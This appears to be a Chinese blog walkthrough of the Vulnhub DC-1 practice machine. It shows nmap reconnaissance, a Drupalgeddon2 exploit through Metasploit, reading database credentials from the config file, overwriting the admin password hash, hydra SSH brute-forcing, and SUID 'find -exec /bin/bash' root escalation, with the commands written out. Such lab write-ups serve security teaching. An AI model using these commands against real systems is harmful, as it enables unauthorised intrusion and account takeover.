Vulnhub靶场 | DC系列 - DC1

https://www.vulnhub.com/series/dc,199/

环境搭建

  1. 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

1. 信息收集

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

在这里插入图片描述

分析可知,靶机 ip 为 192.168.10.147

对靶机进行端口扫描

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.147

在这里插入图片描述

由结果可知,靶机开放了ssh、http和rpcbind服务。

探测对应服务的版本信息

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p22,80,111 192.168.10.147

在这里插入图片描述

web 指纹识别

┌──(root💀kali)-[~/桌面]
└─# whatweb http://192.168.10.147

在这里插入图片描述

发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。),属于 cms 系统之一。

访问网站看一看…
在这里插入图片描述

也可以使用wapp插件查看网站基本信息。
在这里插入图片描述

很明显,我们看到网站的 cms,可以直接在网上搜索这个 cms 的漏洞利用方式
在这里插入图片描述

2. 漏洞利用

使用 metasploit 对漏洞进行利用。

启动 metasploit,搜索 drupal 模块。
在这里插入图片描述

经测试可以采用exploit/unix/webapp/drupal_drupalgeddon2,即:

配置参数(payload、rhosts、lhost),开始攻击,成功建立会话。
在这里插入图片描述

查看网站目录结构,发现 flag1:
在这里插入图片描述

查看 flag1.txt内容,有一个提示信息:需要一个 config file
在这里插入图片描述

进入系统的 shell,并使用python -c "import pty; pty.spawn('/bin/bash');"获得一个交互shell。
在这里插入图片描述

根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。
在这里插入图片描述

内容如下:发现flag2、数据库名、用户名、密码
在这里插入图片描述

flag2提示:“暴力和字典攻击不是获得访问权限的唯一方法(你将需要访问权限)。你能用这些证书做什么?”

使用获取的数据库用户名和密码登录数据库:
在这里插入图片描述

发现该用户只能管理drupaldb数据库。进入数据库,查看库中的表
在这里插入图片描述

发现有个users表
在这里插入图片描述

查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用select * from users\G;查看
在这里插入图片描述

或者:先看看表结构
在这里插入图片描述

查看name和pass列
在这里插入图片描述

该密码不是普通的加密,有可能是网站自己的加密方式。尝试搜索一下相关文件~
在这里插入图片描述

搜索到了一个./scripts/password-hash.sh看似与密码有关。查看文件内容,得知为php脚本,作用是生成一个hash密码。
在这里插入图片描述

使用该脚本生成一个简单的密码,比如123456。将数据库中的密码覆盖掉~

www-data@DC-1:/var/www$ php  ./scripts/password-hash.sh  123456

在这里插入图片描述

覆盖 admin 的密码:

mysql> update users set pass="$S$D3JWVJTOOlXIz0t1Nf.8eg5MrBOqhCVsn.z7m/P4wf4H.OoLYlAf" where name="admin";

在这里插入图片描述

登录网站:
在这里插入图片描述

登录成功。
在这里插入图片描述

在 Dashboard 中发现 flag3 给的提示:

Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.

特殊的PERMS将有助于找到passwd-但您需要执行该命令以确定如何获取shadow中的内容。

在这里插入图片描述

查看 /etc/passwd 文件。
在这里插入图片描述

发现 flag4,flag4是一个普通用户。

尝试查看flag4用户的家目录,确实存在flag4.txt文件,
在这里插入图片描述

提示信息为:在root里?

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

当然如果没有权限访问/home/flag4/flag4.txt,则需要登录flag4用户。由于该服务器也开放了 22 端口,我们可以使用hydra工具爆破flag4用户的密码:

┌──(root💀kali)-[~/桌面]
└─# hydra -l flag4 -P /usr/share/john/password.lst 192.168.10.147 ssh

在这里插入图片描述

爆破结果:密码为orange。

使用 ssh 连接,发现最后一个 flag 的提示信息:in root。

进入 root 目录,发现权限不够,需要提权

在这里插入图片描述

3. 提权

首先想到使用 suid 提权找到一个属于 root 的有 s 权限的文件。

  • SUID(Set User ID),SUID 可以让调用者以文件拥有者的身份运行该文件,所以我们利用 SUID 提权的思路就是运行 root 用户所拥有的 SUID 的文件,那么我们运行该文件的时候就得获得 root 用户的身份了。

常见的可用于 SUID 提权的文件有:

find、bash、nmap、vim、more、less、nano、cp 
//当没有s权限时可以使用:chmod u+s 命令路径,增加权限

查找哪些命令具备 SUID 标识

相关命令:

find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

使用find命令进行提权:

利用 find 命令随便查找一个正确的文件(夹)路径,后面加上 -exec shell 命令 \;

提权 /bin/bash 或者 /bin/sh

www-data@DC-1:/var/www$ find cron.php -exec "/bin/bash" \;
find cron.php -exec "/bin/bash" \;
bash-4.2$ find cron.php -exec "/bin/sh" \;  
find cron.php -exec "/bin/sh" \;
# whoami
whoami
root
# 

在这里插入图片描述

成功提权!拿到最后一个 falg!
在这里插入图片描述

Reference:DC-1

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-14 22:14:02       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-14 22:14:02       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-14 22:14:02       57 阅读
  4. Python语言-面向对象

    2024-07-14 22:14:02       68 阅读

热门阅读

  1. 日记

    2024-07-14 22:14:02       21 阅读
  2. mmc-utils 的 MMC 测试工具

    2024-07-14 22:14:02       19 阅读
  3. docker

    docker

    2024-07-14 22:14:02      22 阅读
  4. python的自省机制(改bug有用)

    2024-07-14 22:14:02       19 阅读
  5. 面试官:如何在SpringBoot启动时执行特定代码

    2024-07-14 22:14:02       20 阅读
  6. 一劳永逸:彻底解决PyCharm中gcc编译器错误

    2024-07-14 22:14:02       17 阅读
  7. TestNG测试框架入门与实践

    2024-07-14 22:14:02       18 阅读
  8. OJ-0710

    2024-07-14 22:14:02       16 阅读
  9. throw 和throws的区别详解

    2024-07-14 22:14:02       19 阅读
  10. Springboot中Aop的使用案列

    2024-07-14 22:14:02       19 阅读
  11. 计算机网络——常见问题汇总2

    2024-07-14 22:14:02       16 阅读